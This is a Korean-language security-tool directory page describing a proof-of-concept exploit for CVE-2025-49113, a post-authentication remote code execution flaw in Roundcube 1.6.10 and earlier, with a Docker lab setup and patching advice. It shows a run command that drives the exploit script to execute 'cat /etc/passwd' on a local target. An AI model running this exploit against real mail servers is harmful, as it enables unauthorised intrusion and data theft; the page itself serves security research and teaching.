Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-49113 — Roundcube ≤ 1.6.10용 인증 후 RCE 익스플로잇 (PHP 객체 역직렬화를 통한), Docker 기반 실습 환경 및 보안 연구 및 교육을 위한 기술 문서 포함. | Kitploit
도구/GitHubGitHub/fearsoff-org/cve-2025-49113
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubfearsoff-org/cve-2025-49113

CVE-2025-49113

Roundcube ≤ 1.6.10용 인증 후 RCE 익스플로잇 (PHP 객체 역직렬화를 통한), Docker 기반 실습 환경 및 보안 연구 및 교육을 위한 기술 문서 포함.

저장소 보기
108231년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

📧 Roundcube ≤ 1.6.10 인증 후 RCE (PHP 객체 역직렬화를 통한) [CVE-2025-49113]

🔍 분석 보고서

Roundcube(버전 ≤ 1.6.10)에서 안전하지 않은 PHP 객체 역직렬화로 인한 심각한 인증 후 원격 코드 실행 취약점이 발견되었습니다. 이 심각한 결함은 10년 이상 코드베이스에 조용히 존재해 왔습니다.

전체 기술 분석 및 익스플로잇 세부 정보는 다음을 방문하세요:

👉 https://fearsoff.org/research/roundcube


🐳 빠른 설치 (Docker 사용)

다음 명령은 Docker 컨테이너 내에 Ubuntu 24.04, Roundcube 및 모든 필수 종속성을 설치합니다:

root@kitploit:~
docker run --name ubuntu24 \
  -p 9876:80 \
  -v "$PWD/rc_install.sh":/root/rc_install.sh \
  -it ubuntu:24.04 \
  bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"

⚠️ 참고: 격리된 환경에서만 사용하세요. 취약한 인스턴스를 공개 인터넷에 노출하지 마십시오.

⚠️ 면책 조항

이 개념 증명 코드는 교육 및 연구 목적으로만 제공됩니다. 작성자와 기여자는 이 코드의 사용으로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 불법이며 엄격히 금지됩니다.

실행:

시스템에 php가 설치되어 있는지 확인하세요

root@kitploit:~
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"

👤 작성자 및 크레딧

  • Author: Kirill Firsov (https://x.com/k_firsov)
  • Organization: FearsOff (https://fearsoff.org)

🛡️ 대응 방안

Roundcube ≤ 1.6.10을 사용 중이라면 즉시 최신 패치 버전으로 업데이트하여 이 취약점을 제거하세요.


📜 라이선스

이 프로젝트와 관련 문서는 MIT 라이선스에 따라 제공됩니다.

도구 다운로드